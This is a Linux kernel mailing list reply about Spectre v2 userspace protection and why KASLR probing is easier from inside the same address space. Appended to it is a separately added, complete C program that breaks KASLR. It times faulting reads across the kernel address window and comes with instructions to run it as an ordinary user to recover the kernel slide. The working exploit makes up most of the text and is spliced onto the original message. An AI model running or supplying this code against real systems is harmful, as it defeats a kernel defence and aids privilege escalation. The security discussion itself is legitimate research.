Re: [Patch v3 00/13] Provide process property based options to enable Spectre v2 userspace-userspace protection

From: Tim Chen
Date: Fri Oct 19 2018 - 12:43:39 EST


On 10/19/2018 12:57 AM, Peter Zijlstra wrote:
> On Wed, Oct 17, 2018 at 10:59:28AM -0700, Tim Chen wrote:
>> Application to application exploit is in general difficult due to address
>> space layout randomization in applications and the need to know an
>
> Does the BTB attack on KASLR not work for userspace?
>

With KASLR, you can probe the kernel's mapped and unmapped
addresses with side channels like the TLB and infer the kernel mapping
offsets much more easily, as the kernel is in the same address
space as the attacking process. It is a lot harder to do
such probing from another process that doesn't share the
same page tables.

Tim
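The in-process probe Tim describes, as an added example that is not code from this thread or from the kernel tree: a user process times its own faulting accesses to candidate kernel addresses. Because the kernel lives in the probing process's own page tables (on kernels without PTI), the CPU walks the page tables and, for a mapped kernel page, loads a TLB entry before raising the privilege fault; repeated touches of a mapped page therefore fault with a different latency than touches of an unmapped page (the double page fault channel of Hund, Willems and Holz, IEEE S&P 2013). Scanning the KASLR window reveals where the image sits. The x86-64 window `0xffffffff80000000`-`0xffffffffc0000000` and the 2 MiB step are assumptions made for the example, as is the clock_gettime fallback on non-x86 builds; the sample addresses used in the test are constructed. A second process that does not share these page tables gets no such translation from its own walks, which is the asymmetry the reply is pointing at.

```c
/*
 * Added example (not from the thread): time faulting reads of candidate
 * kernel addresses from user space to find the mapped kernel image.
 * Assumed: x86-64 layout, KASLR window and 2 MiB step; no KPTI.
 */
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define MAX_REPS 64

static sigjmp_buf recover;
static volatile char sink;
static int handler_installed;

static void fault_handler(int sig)
{
    (void)sig;
    siglongjmp(recover, 1);          /* resume inside time_faulting_access() */
}

/* Catch the access violations the probe deliberately triggers. */
static void install_fault_handler(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = fault_handler;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, NULL);
    sigaction(SIGBUS, &sa, NULL);    /* non-canonical addresses on some CPUs */
    handler_installed = 1;
}

/* Cycle counter on x86-64; assumed fallback: monotonic nanoseconds elsewhere. */
static uint64_t timestamp(void)
{
#if defined(__x86_64__)
    uint32_t lo, hi;
    __asm__ __volatile__("lfence\n\trdtsc" : "=a"(lo), "=d"(hi) : : "memory");
    return ((uint64_t)hi << 32) | lo;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/*
 * Time one read of addr that is expected to fault. Returns elapsed ticks from
 * the load until control returns from the fault handler, or 0 if the address
 * was readable (user memory, not a kernel candidate).
 */
uint64_t time_faulting_access(const volatile char *addr)
{
    volatile uint64_t start = 0;     /* volatile: survives siglongjmp */
    if (!handler_installed)
        install_fault_handler();
    if (sigsetjmp(recover, 1) == 0) {
        start = timestamp();
        sink = *addr;                /* faults on a kernel address */
        return 0;
    }
    return timestamp() - start;
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n samples: robust against interrupts landing inside a probe. */
uint64_t median_u64(uint64_t *v, size_t n)
{
    qsort(v, n, sizeof *v, cmp_u64);
    return v[n / 2];
}

/* Median fault latency over reps touches of one candidate; from the second
 * touch on, a mapped page is served from the TLB entry the first walk loaded. */
uint64_t probe_address(uintptr_t addr, int reps)
{
    uint64_t samples[MAX_REPS];
    if (reps > MAX_REPS) reps = MAX_REPS;
    if (reps < 1) reps = 1;
    for (int i = 0; i < reps; i++)
        samples[i] = time_faulting_access((const volatile char *)addr);
    return median_u64(samples, (size_t)reps);
}

int main(void)
{
    /* Assumed x86-64 KASLR window for the kernel image: 1 GiB, 2 MiB steps. */
    const uintptr_t base = (uintptr_t)0xffffffff80000000ULL;
    const uintptr_t end  = (uintptr_t)0xffffffffc0000000ULL;
    const uintptr_t step = (uintptr_t)2 << 20;

    for (uintptr_t a = base; a < end; a += step)
        printf("%#lx %llu\n", (unsigned long)a,
               (unsigned long long)probe_address(a, MAX_REPS));
    /* A step change in latency marks the mapped image. With KPTI the kernel
       is not present in the user page table, so no step appears. */
    return 0;
}
```

Run it as an ordinary user and look for the address at which the printed median changes level; the offset from `base` is the KASLR slide. The same program run from another process tells you nothing about the first process's mappings, which is the cross-process difficulty the reply describes.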